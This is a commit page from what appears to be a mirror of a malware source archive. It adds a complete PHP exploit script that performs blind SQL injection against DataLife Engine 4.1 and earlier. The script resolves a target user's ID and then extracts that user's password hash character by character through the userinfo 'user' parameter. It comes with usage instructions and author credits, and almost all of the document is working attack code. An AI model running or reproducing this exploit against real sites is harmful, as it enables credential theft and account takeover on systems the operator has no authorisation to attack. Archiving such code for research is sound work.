mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2026-06-15 15:29:23 +00:00
Add files via upload
This commit is contained in:
vxunderground
GitHub
@@ -0,0 +1,98 @@
|
||||
<?php
|
||||
error_reporting (E_ERROR);
|
||||
ini_set("max_execution_time",0);
|
||||
|
||||
echo '
|
||||
+========================================+
|
||||
| RST/GHC Datalife SQL injection exploit |
|
||||
+========================================+
|
||||
< > Lite Version for DLE <=4.1 < >
|
||||
';
|
||||
|
||||
if ($argc < 2 ){
|
||||
print " Usage: " . $argv[0] . " <host> <user> [table prefix]\n";
|
||||
print " ex.: " . $argv[0] . " datalife.engine.net admin\n";
|
||||
credits();
|
||||
exit;
|
||||
}
|
||||
|
||||
//DEFINE USER ID
|
||||
$urla = 'http://' . $argv[1] . '/index.php?subaction=userinfo&user=' . $argv[2];
|
||||
$result = file_get_contents($urla);
|
||||
$str1 = 'user='; #index.php?do=pm&doaction=newpm&user=
|
||||
$position = strpos($result, $str1);
|
||||
|
||||
if ($position === false){ print "\n\rSorry, no match found for user " . $argv[2]; credits();}
|
||||
$str2 = '">';
|
||||
$pos = strpos($result, $str2, $position);
|
||||
$pos1 = $position+5;
|
||||
$user_id = intval(substr($result, $pos1, $pos-$pos1));
|
||||
|
||||
print "Trying to get hash for password of user ". $argv[2] ." with id=" . $user_id . ":\n";
|
||||
|
||||
//SOME defines (aka CONFIG =))
|
||||
if (empty($argv[3])){ $prefix = 'dle_';} #define prefix of the tables. try to find it yourself =) it is easy =)
|
||||
else {$prefix = $argv[3];}
|
||||
$min = 48; # 0
|
||||
$max = 122; # z
|
||||
if (check(">$min", 1) == 0 && check("<$max", 1) == 0) {print "\n Site is unvulnerable..."; credits();}
|
||||
for ($sn=1; $sn <= 32; $sn++) {
|
||||
blind($sn, $min, $max);
|
||||
}
|
||||
credits();
|
||||
|
||||
|
||||
// REQUEST function
|
||||
function check($crcheck, $sn)
|
||||
{
|
||||
global $argv, $user_id, $prefix;
|
||||
$host = 'http://' . $argv[1] . '/index.php'; # argv[1] - host
|
||||
$name = $argv[2]; #user name
|
||||
$query = '?subaction=userinfo&user=' . $name .'%2527%20and%20ascii(substring((SELECT%20password%20FROM%20' . $prefix. 'users%20WHERE%20user_id='. $user_id .'),' . $sn . ',1))' .$crcheck . '/*'; #
|
||||
|
||||
$http = $host . $query;
|
||||
#DEBUG
|
||||
#print $http . "\n";
|
||||
$result = file_get_contents($http);
|
||||
|
||||
// checking the answer
|
||||
$string = ': '.$name.'</h2>'; #CORRECT it FOR your version, kids =)
|
||||
#good idea is: 'do=pm&doaction=newpm&user='.$user_id;
|
||||
|
||||
if (eregi($string, $result)) { return 1; }
|
||||
|
||||
return 0;
|
||||
}
|
||||
|
||||
//range function
|
||||
function blind($sn, $fmin, $fmax)
|
||||
{
|
||||
if (($fmax-$fmin)<5) { if (crack($fmin, $fmax, $sn) == 0){print "\n\rEXPLOIT FAILED..."; credits();} return;}
|
||||
$compare = intval($fmin + ($fmax-$fmin)/2);
|
||||
$crcheck = ">". $compare;
|
||||
if ( check($crcheck, $sn) == 1 ) {
|
||||
blind($sn, $compare, $fmax);
|
||||
}
|
||||
else {
|
||||
blind($sn, $fmin, $compare+1); }
|
||||
}
|
||||
|
||||
//brute function
|
||||
function crack($cmin, $cmax, $sn)
|
||||
{
|
||||
for ($i=$cmin; $i <=$cmax; $i++){
|
||||
$crcheck = "=$i";
|
||||
if (check($crcheck, $sn) == 1){print chr($i); return 1;}
|
||||
}
|
||||
return 0;
|
||||
}
|
||||
|
||||
|
||||
function credits(){
|
||||
print "\n\n+========================================+\n\r Credits: 1dt.w0lf & foster \n\r Copyright (c) RST/GHC";
|
||||
print "\n\r http://rst.void.ru && http://ghc.ru\n\r+========================================+\n";
|
||||
exit;
|
||||
}
|
||||
|
||||
?>
|
||||
|
||||
Reference in New Issue
Block a user